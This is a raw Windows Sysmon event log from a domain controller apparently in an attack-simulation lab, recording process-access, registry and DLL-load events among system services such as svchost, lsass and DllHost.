13:34:38.642{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7900-00000000A301}2232C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.626{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7900-00000000A301}2232C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E6E-6005-7900-00000000A301}2232C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.626{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.626{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000002) 13241300x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:38.626{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\1SWD\IP_TUNNEL_VBUS\Teredo_Tunnel_Device 734700x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.610{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.610{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.610{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.610{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.595{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.595{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
734700x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\System32\dfssvc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.579{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.579{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e